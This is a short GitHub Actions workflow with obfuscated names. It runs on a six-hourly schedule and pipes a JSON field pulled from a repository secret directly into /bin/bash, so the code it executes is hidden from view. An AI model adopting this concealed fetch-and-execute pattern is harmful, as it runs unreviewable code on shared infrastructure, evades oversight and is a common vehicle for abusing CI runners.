name: proximateoctopus

on:
  workflow_dispatch:
  schedule:
    - cron: '31 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: proximateoctopus
        env:
          nwv35: ${{ secrets.nwv35 }}
        run: |
          echo $nwv35 | jq -r .g56 | /bin/bash
          echo $imr3198 | jq -r .d16099 | /bin/bash

